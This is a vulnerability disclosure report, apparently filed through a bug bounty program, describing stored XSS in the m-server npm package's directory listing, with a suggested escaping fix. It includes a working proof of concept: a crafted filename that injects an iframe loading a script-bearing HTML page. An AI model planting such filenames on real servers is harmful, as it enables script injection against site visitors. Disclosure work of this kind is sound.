I would like to report Stored XSS vulnerability in m-server
module.
m-server
displays content of selected directory as HTML in the browser. However, no escape is implemented which allows malicious user to embed executable JavaScript or HTML code (eg. to load HTML document into iframe
element and execute JavaScript from within loaded file).
module name: m-serverversion:1.4.0npm page: https://www.npmjs.com/package/m-server
M-Server is a mini http static server that without any dependencies;
Stats
6 downloads in the last day
68 downloads in the last week
180 downloads in the last month
~2200 estimated downloads per year
No HTML special characters escape is implememtned in the function which constructs and returns HTML with current directory listing:
// node_modules/m-server/lib/utils.js, line 57
dirs.sort(sort).forEach(function (val) {
html.push('<li><a href>' + val + '</a></li>');
});
files.sort(sort).forEach(function (val) {
html.push('<li><a href>' + val + '</a></li>');
});
html.push('</ul>');
return html.join('');
m-server
module:$ npm install m-server
malware_frame.html
file with following content:<html>
<head>
<meta charset="utf8" />
<title>Frame embeded with malware :P</title>
</head>
<body>
<p>iframe element with malicious code</p>
<script>
alert('Uh oh, I am bad, bad malware!!!')
</script>
</body>
</html>
"><iframe src="malware_frame.html">
m-server
in the same directory, where two above files exist:$ ./node_modules/m-server/index.js -p 8080
-------------------------------------------------------------
Mini http server running on port 8080 !
You can open the floowing urls to view files.
127.0.0.1:8080
10.235.1.22:8080
10.235.4.26:8080
Have fun ^_^
-------------------------------------------------------------
malware_frame.html
executed immediately:{F267014}
Both files can be uploaded by malicious user if eg. other vunerabilities in other applications exist on the same server (eg. upload file feature) or if attacker gains an access to the server using poorly secured remote access.
escape-html
module can be used to prevent this attack (https://www.npmjs.com/package/escape-html):
const escapeHtml = require('escape-html')
(...)
// vulnerable part of node_modules/m-server/lib/utils.js:
dirs.sort(sort).forEach(function (val) {
html.push('<li><a href>' + escape(val) + '</a></li>');
});
files.sort(sort).forEach(function (val) {
html.push('<li><a href>' + escape(val) + '</a></li>');
});
html.push('</ul>');
return html.join('');
Regards,
Rafal ‘bl4de’ Janicki
Malicious user is able to inject iframe element with malicious JavaScript code via crafted filename when directory listing is displayed in the browser
The hacker selected the Cross-site Scripting (XSS) - Stored weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:
Verified
Yes